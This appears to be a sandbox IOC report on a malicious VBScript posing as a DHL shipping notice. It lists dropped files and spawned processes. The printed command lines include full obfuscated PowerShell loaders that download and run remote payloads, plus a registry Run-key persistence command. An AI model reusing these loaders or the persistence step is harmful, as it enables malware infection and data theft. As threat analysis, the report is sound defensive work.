IOC Report
DHL_ES567436735845755676678877988975877.vbs

loading gif

Files

File Path
Type
Category
Malicious
DHL_ES567436735845755676678877988975877.vbs
ASCII text, with very long lines (338), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs
ASCII text, with very long lines (335), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\mvourhjs.dat
data
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21gn1cvr.mos.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2u4npw35.e0j.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ey2gvbbt.de4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h4orpqzj.roa.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lohwdhxb.l5v.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mzrggcit.xnm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngmp2xy1.sd3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vuwthfb5.bb5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhvB55A.tmp
Extensible storage engine DataBase, version 0x620, checksum 0x06159722, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\cUb5G1h4
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
dropped
C:\Users\user\AppData\Local\Temp\eeubmxzcykpvacklrogamlalknwo
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Antillean144.Gro
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Roaming\Presignal23.Hal
ASCII text, with very long lines (65536), with no line terminators
dropped
There are 9 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeInfomUndeeUnd,rUnp,sGod,.SkraHIndpeAgerahided AlleTromrBvens Tep[Appl$Rri.iHoa,mDispp QuerhereoK mmvHjsleInd rAltesPaup]Conv=Trla$TromP vanlgubeaPerenRe slShrugSa vgUnqueHos,lBedss pseeConsr AutnItereslie2 Vre3Utop5 Bea ');$Republicanisms=Teucrium 'ResiDDe fr yniPosefStymt S ysShampFathr Traocardb SmdlPhote AcymOrdfe Ar,rMonosS ar.LndeDBrano H jw tilnKaoll ,igoAfpraTho dMiniFrykki upelDd.deAnal(Sult$St,cOPeriv SpaaAntarUly iScapePicncBedetRadio NonmBigaiPseuzTrkve Afg,Unbl$FlygFRet,eFri.lUnsptAlmelU.etaLet.zRefraAcourAduneDeput onetU,rue PrgrpergsNor.)lith ';$Republicanisms=$subinsertion[1]+$Republicanisms;$Feltlazaretters=$subinsertion[0];Regulerbare (Teucrium 'Symp$dhurg HonlS,lvoMultbOldfaUdmal ,ns:in.tT Hala StrkInhas,ntrtundegUn drFor nShidsKateeSpirrP.emnConveIzvo= lue(S udT AfkeIngrsSweatSoen-SynfPUd.ra LabtUsaahMowt Sang$StorF T neAtoml .oatShovlBlesaAbalz Br.aHjrerDeraeTekstLinstGymneForerPseusG.rd)Glg, ');while (!$Takstgrnserne) {Regulerbare (Teucrium 'Navn$ Exag C.al BoroB,gnbOveraUn cl B s:Th rMSkome U,sjIngreCi.ft.ptarSpors S ukNaileOleirSejrnButaeTrussSkls= Fje$Birkt AllrT.uduOp heTh,o ') ;Regulerbare $Republicanisms;Regulerbare (Teucrium 'SnydSLenit BroaAfr rBundtR.ac- MavSTy,ol iseIndfeafskp af Ento4 Exo ');Regulerbare (Teucrium 'Anal$AnargStralSemioB,isbGen aAfdrlSemi:FdreTInt.aNedrkGru.sTinst UnfgPidgrPolynSkr sLivse .rorLadenFarmeDiam= App(chanTsitueBrofsBisttLyss-DispPHoloaWhitt ClihTha, Femr$ .erFHense.ormlBed,t GanlNovaaManuzUdbeabivurUbele DjitEpiltechiePnser acsSkjo) B n ') ;Regulerbare (Teucrium 'H,rn$Blyag,arblD troS.edb Stia MinlNonf:InfoIBah nBlougFrdee Avin.looiAnnirFun,f epi DetrOmvlmHjemaunlieSkatrSkygsUnsi= ,ur$AdfrgUhenlLoq o KrlbKr,ga,eamlDelt:AcetP leplKi ka B,ad BauaVollr BozoMet mLageaCani+Chry+ .al%Arki$Sem T Fusa EmbaE.sklReasmMut.oThord .uli DatgSpith,aadeReakd Swi. Elec,andoUnswuGlucnSil.tHe,t ') ;$Ovariectomize=$Taalmodighed[$Ingenirfirmaers];}Regulerbare (Teucrium '.orf$,tedgHvall Ov,oBranbTrakaka fl Rat: DorRove aGenelsp,npTr.shUnst To,d= lan Dia,GDiskeMatitDebi-CionCEfteo brunAuditlsble Mu,n Sastalde Mas$ PerFHyoee BielSelvtclitlMimiaTelezA,tiaEns,r ,teeSobbtAurotF rleSuperMasosLysd ');Regulerbare (Teucrium 'grns$TissgFolklF buoOverbG nsa ejalS.in:Ce tM Si,eRottt NonaAntilFootbTheae AlcaKlimrTruniPurgnLitogRae Gene=Vivi re,o[ Tr SChilyDybtsPal.tBruseAfprmHuma.HutcCRetsoDonanR miv UddeSubtrApp tCh c]V lk: Kvi:etamFBillrUl.roSjusmOilsBStataL.mpsPoteeStud6Saml4ErhvS P,ltSterrIl,kiAse,nUnpagTret(Es h$GeolR GreaMultlDiskpLuerhs,ig)Ofre ');Regulerbare (Teucrium 'A pa$LedegParalexcro UnrbInveaR gslHigh:FangRPilsa WittSameiTilfoStasnVarieAfler phon ag eRo ss Tri Diso=Pene Pa [KrafSBa syBaldsStuctKon.eTrolm tab.Sam TEnt e.remx .attSupe. dklEPoinnDrejcKn.vo Ko,d ChaiCessnP.rag,ult]Im,o:Pasf:PartAforgS F,rCCapeI,oteIGl.d.RekyG .heeC phtha.dS Ru,tB.ndrPi,iiPectn .leg Uns( onu$AtomM ,oeeKon tMul,aIllulBehabPom,eLeksa.nanrPerpiUnshnForegDybf)P.ak ');Regulerbare (Teucrium 'Nod $ UdjgembrlMineoSt.mbM loaTelelkont:Ar,hFRe veSyslrD.lmrGiobiFoerm ParaDisegSkotn At e BiatPs,uiPlyic Tak=R ma$BasiR,oraatekntParcibl,noH emnFa.ie BesrantinKrepeMikssgrun. ac.sN.npu .tebSodasPirotBrnerSkreiBygenRattgDimi(Magu3S lp2Step0Gros2 Maj5Anis7 at, haa2St.g8 Pol9Omgi8Amer1Gear)Bl c ');Regulerbare $Ferrimagnetic;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeInfomUndeeUnd,rUnp,sGod,.SkraHIndpeAgerahided AlleTromrBvens Tep[Appl$Rri.iHoa,mDispp QuerhereoK mmvHjsleInd rAltesPaup]Conv=Trla$TromP vanlgubeaPerenRe slShrugSa vgUnqueHos,lBedss pseeConsr AutnItereslie2 Vre3Utop5 Bea ');$Republicanisms=Teucrium 'ResiDDe fr yniPosefStymt S ysShampFathr Traocardb SmdlPhote AcymOrdfe Ar,rMonosS ar.LndeDBrano H jw tilnKaoll ,igoAfpraTho dMiniFrykki upelDd.deAnal(Sult$St,cOPeriv SpaaAntarUly iScapePicncBedetRadio NonmBigaiPseuzTrkve Afg,Unbl$FlygFRet,eFri.lUnsptAlmelU.etaLet.zRefraAcourAduneDeput onetU,rue PrgrpergsNor.)lith ';$Republicanisms=$subinsertion[1]+$Republicanisms;$Feltlazaretters=$subinsertion[0];Regulerbare (Teucrium 'Symp$dhurg HonlS,lvoMultbOldfaUdmal ,ns:in.tT Hala StrkInhas,ntrtundegUn drFor nShidsKateeSpirrP.emnConveIzvo= lue(S udT AfkeIngrsSweatSoen-SynfPUd.ra LabtUsaahMowt Sang$StorF T neAtoml .oatShovlBlesaAbalz Br.aHjrerDeraeTekstLinstGymneForerPseusG.rd)Glg, ');while (!$Takstgrnserne) {Regulerbare (Teucrium 'Navn$ Exag C.al BoroB,gnbOveraUn cl B s:Th rMSkome U,sjIngreCi.ft.ptarSpors S ukNaileOleirSejrnButaeTrussSkls= Fje$Birkt AllrT.uduOp heTh,o ') ;Regulerbare $Republicanisms;Regulerbare (Teucrium 'SnydSLenit BroaAfr rBundtR.ac- MavSTy,ol iseIndfeafskp af Ento4 Exo ');Regulerbare (Teucrium 'Anal$AnargStralSemioB,isbGen aAfdrlSemi:FdreTInt.aNedrkGru.sTinst UnfgPidgrPolynSkr sLivse .rorLadenFarmeDiam= App(chanTsitueBrofsBisttLyss-DispPHoloaWhitt ClihTha, Femr$ .erFHense.ormlBed,t GanlNovaaManuzUdbeabivurUbele DjitEpiltechiePnser acsSkjo) B n ') ;Regulerbare (Teucrium 'H,rn$Blyag,arblD troS.edb Stia MinlNonf:InfoIBah nBlougFrdee Avin.looiAnnirFun,f epi DetrOmvlmHjemaunlieSkatrSkygsUnsi= ,ur$AdfrgUhenlLoq o KrlbKr,ga,eamlDelt:AcetP leplKi ka B,ad BauaVollr BozoMet mLageaCani+Chry+ .al%Arki$Sem T Fusa EmbaE.sklReasmMut.oThord .uli DatgSpith,aadeReakd Swi. Elec,andoUnswuGlucnSil.tHe,t ') ;$Ovariectomize=$Taalmodighed[$Ingenirfirmaers];}Regulerbare (Teucrium '.orf$,tedgHvall Ov,oBranbTrakaka fl Rat: DorRove aGenelsp,npTr.shUnst To,d= lan Dia,GDiskeMatitDebi-CionCEfteo brunAuditlsble Mu,n Sastalde Mas$ PerFHyoee BielSelvtclitlMimiaTelezA,tiaEns,r ,teeSobbtAurotF rleSuperMasosLysd ');Regulerbare (Teucrium 'grns$TissgFolklF buoOverbG nsa ejalS.in:Ce tM Si,eRottt NonaAntilFootbTheae AlcaKlimrTruniPurgnLitogRae Gene=Vivi re,o[ Tr SChilyDybtsPal.tBruseAfprmHuma.HutcCRetsoDonanR miv UddeSubtrApp tCh c]V lk: Kvi:etamFBillrUl.roSjusmOilsBStataL.mpsPoteeStud6Saml4ErhvS P,ltSterrIl,kiAse,nUnpagTret(Es h$GeolR GreaMultlDiskpLuerhs,ig)Ofre ');Regulerbare (Teucrium 'A pa$LedegParalexcro UnrbInveaR gslHigh:FangRPilsa WittSameiTilfoStasnVarieAfler phon ag eRo ss Tri Diso=Pene Pa [KrafSBa syBaldsStuctKon.eTrolm tab.Sam TEnt e.remx .attSupe. dklEPoinnDrejcKn.vo Ko,d ChaiCessnP.rag,ult]Im,o:Pasf:PartAforgS F,rCCapeI,oteIGl.d.RekyG .heeC phtha.dS Ru,tB.ndrPi,iiPectn .leg Uns( onu$AtomM ,oeeKon tMul,aIllulBehabPom,eLeksa.nanrPerpiUnshnForegDybf)P.ak ');Regulerbare (Teucrium 'Nod $ UdjgembrlMineoSt.mbM loaTelelkont:Ar,hFRe veSyslrD.lmrGiobiFoerm ParaDisegSkotn At e BiatPs,uiPlyic Tak=R ma$BasiR,oraatekntParcibl,noH emnFa.ie BesrantinKrepeMikssgrun. ac.sN.npu .tebSodasPirotBrnerSkreiBygenRattgDimi(Magu3S lp2Step0Gros2 Maj5Anis7 at, haa2St.g8 Pol9Omgi8Amer1Gear)Bl c ');Regulerbare $Ferrimagnetic;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Presignal23.Hal && echo $"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
malicious
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Vibeka" /t REG_EXPAND_SZ /d "%Pneumatorrhachis% -w 1 $Salpeterholdiges=(Get-ItemProperty -Path 'HKCU:\Quicker\').Savvy;%Pneumatorrhachis% ($Salpeterholdiges)"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Sydstligstes.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jettes (Circumflexes ' Hic$DefiSGoo k.orteTranpNulvtgummi,nfrcO,dy. skrHUn ieAa aa PerdSp,reBillrJordsB.am[Frug$FormOSuttpFidutLnsird nkiGiggnBlansfeer4I da5Over]Korv=Reig$di,kS StuiUhelmInseuKnsklLeattu,spadur.nQuadsEmulc CykeSlavn H pe Regr fkosUdry ');$Isoln=Circumflexes ' .meS,ondkSka eSemipUndetSpgeiP,nccAver.Mer.DAnomoP stw.deanthrolov roFarta N,ddSt dFAssui Krel Bd,eUntr(Ove,$OmsoLScarePerevDyreeflyvmJi buStorl Kkki PergWarnh ikleFuldd .dr,Gfor$.aktHEpisvPriniHarerSexuv PholBll e Pros ya)un.h ';$Isoln=$Forankringspunktets[1]+$Isoln;$Hvirvles=$Forankringspunktets[0];Jettes (Circumflexes ' Sh $Eft gPounlFromoUfatb iea S,ilUnc,:CasuPFlanuStjdnVaskc B.otRighuU.tis Sor=hu,t(SculTCorreOutks Th,tReal-SyttP avaRingt Tr hThru Modt$GlauH.elfvForkiTensrr.prvMowelLaise Pe.s eat) Tyn ');while (!$Punctus) {Jettes (Circumflexes 'Unpr$B.blgPolylPorto Ba.bKampaAzidlPaal:MonomUdslaharorCanacBdeaeBr.nsSupecSubreSretn ThocTor.eDat,=Macr$.xtrtOverrBobbuNonseHnge ') ;Jettes $Isoln;Jettes (Circumflexes ' MinSKu.ttPensaOverr ynetMatr-PromSMin lThimeCosteSkndpSkva npa4,esp ');Jettes (Circumflexes 'Ufor$ SilgKat.lLiquochokbBrnda Trol kur:SnowPPostuAndenAnlgcAf.utSk.duAffesOver=Bram( afgT DrieRemisOwentFelt- UdfPBlomaD,fftRe,vhNd.i Frad$ ollH Tipv ProiHyd rUp.av ForlBefoeProjsHjes)Sewm ') ;Jettes (Circumflexes 'Coin$ OrngWaftlB.reo veb Scoa AttlQuis:.axiVDekroAggrl Spol s.ae ParyJingbResuaAlcolDamplVo,dsBlr,=Skub$ProtgRufflserooR.cibLe ea MenlAr,o: O.eMEmmeaTommgForriUdbrkK.sse,kkor.trinAksge aars.jem+Inst+ T l%Prom$BecrAVarsl UdtvShoreHvo,oLeavlTrieiCrybtAcceeTveds Jvn.LeptcMetaoRegou eren,amnt .is ') ;$Levemulighed=$Alveolites[$Volleyballs];}Jettes (Circumflexes 'Anon$ LiggAsenlUnchoOph.bPalaa utilSubm:TndeHCyatoConcvNonoeDelidApoksBruntStemrHermuCou,kringtr thuRingrUheleSrstrBiocnSla.e,refsTil, D.st=Matr Di,GAmate galtBesk-DissCNon.oCournPartt FoueUf.dnM,wstCamb Vi.r$VatiHkapevHydri LetrStatvA,allSpaaeCocos Hae ');Jettes (Circumflexes 'Tenn$ JusgPorzl HolochacbUnp aB,vrl Uar:chawAPostbOpgrjModeuScordForgi.yrec andaOvert,tereHern Diss= sta Ciga[flagSHoveyAfghsJesut Sube ConmTool. VrdCSingoForfn Myov,rlleOthir s.itUnva]Astr:Kont:BeviFsamorCarroPlanmliftBanh aTil,sC.rreDown6arbe4UnfrSA.altFestr Veji Civn,tilg,onr(Fors$KnskH PeroPrebv.oule StadForusWrestPerirs.etuser k TaltEkstuDecarPumpeHyper Ne.n H,le Mims Uds)Br.c ');Jettes (Circumflexes ',eta$O elgEr,vl BenoskrmbmesoaMalllAlon:bifiLS.tivA.glhAstry ObetModetud.meSk,lr KlonEmboeSupe Ungd=Stil prie[ChurS isey kovsInittEl ve HucmGram. In,TBazoeKonsxRu,gtSk,a. VogE,ekanhempc ,oso MatdStn,iDrifnSa mgAdmi] Pej: La : MasAInskSStriC Ud,I ComIInda.UnreGVarieTeatt .ilSSmeltPaver U.fiMyrenManggAgna(Dekl$GuidA.omabOrdrjFreiu .tad,onhiUnfacIndka KabtRelaeGoom) U,l ');Jettes (Circumflexes 'Semi$Par,gNongl SupoB,rebBe raGrsrlF.ld:Res,SMultk Foli fugkU,sak GeneBol,lAcets frueconjnSm.tsR bb=luge$NotaL ,gev,aglh UngyMam.tFarvtPayoeSatirSisynKom,e ,ke.Ka,as.onbuDeutb KoesBorutSeksrEli iTelenMyopgtra,(Ser,3Faul1O.om4Efte7 lot8Unwa4 Fr.,Forb2 .lo6 Mid3Ba o0.arv2Mis )Coup ');Jettes $Skikkelsens;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
